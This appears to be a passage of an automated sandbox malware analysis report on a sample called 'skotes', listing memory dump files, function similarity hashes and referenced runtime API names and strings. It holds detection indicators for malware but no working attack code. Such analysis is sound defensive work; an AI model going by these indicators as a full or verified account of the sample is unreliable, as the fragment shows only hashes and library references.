                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1182035702-0
                                                                                                                                                                                                                                          • Opcode ID: 79230b919324979136801fb9a22900acc10117c7a17af6ce78c5a06d991f3663
                                                                                                                                                                                                                                          • Instruction ID: 3370ac9ed78c2a3e0d0cc31c50e2c684c1d8d655dcd85681a47183f50604f57c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79230b919324979136801fb9a22900acc10117c7a17af6ce78c5a06d991f3663
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9213D70C142198AEF24FFA4C8556EEB7F0FF15320F6009AAE171A61E1E7B19A44CB55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00BA1B57
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BA1B66
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BA1C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                                                                                                                          • String ID: pContext$switchState
                                                                                                                                                                                                                                          • API String ID: 2656283622-2660820399
                                                                                                                                                                                                                                          • Opcode ID: 39fb9b71109cb492cd32fb02b967051bcebfb413860fadf3d44e805eb3031a2e
                                                                                                                                                                                                                                          • Instruction ID: 2494c9bddfbfd91c1e3ed9cee3a86735b94f819df7a7a20e158c304cd7e9e5b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39fb9b71109cb492cd32fb02b967051bcebfb413860fadf3d44e805eb3031a2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E31A835A042149BCF44EF6CC481EAD77F5EF46320F5049E9E911AB291EB70DD01CBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsrchr
                                                                                                                                                                                                                                          • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                          • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                          • Opcode ID: 64d5fea2e315c65df3773f7c42838bfc154619de1837e1f05e22cf14484bf451
                                                                                                                                                                                                                                          • Instruction ID: 47e1c7359ab79f4a3c91fb9d7f920378fa97ef0d2a60ebdb8fee3fc679fd5c8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64d5fea2e315c65df3773f7c42838bfc154619de1837e1f05e22cf14484bf451
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A301042765C623356A145119AD02F7A23C8DBC3BB4B2640AFFC64F72C2EF44DC4361A8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B8FB06
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                          • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 348560076-465693683
                                                                                                                                                                                                                                          • Opcode ID: 79f7e2717a7f9a95112cc2a5dac71f9bd7c3dda3c92e970d63090a660d586a6e
                                                                                                                                                                                                                                          • Instruction ID: d51216943da9e4a6ae2716c16cd00e85a5d4b8e22562daa0aa2d79706ab670c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79f7e2717a7f9a95112cc2a5dac71f9bd7c3dda3c92e970d63090a660d586a6e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5901F9615517166DA610B6BD5CD3FBB66DCC9436187200DBBB401E31A2EEA4D8008276
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • StructuredWorkStealingQueue.LIBCMT ref: 00BA20B7
                                                                                                                                                                                                                                            • Part of subcall function 00B9CAF3: Mailbox.LIBCMT ref: 00B9CB2D
                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BA20C8
                                                                                                                                                                                                                                          • StructuredWorkStealingQueue.LIBCMT ref: 00BA20FE
                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BA210F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
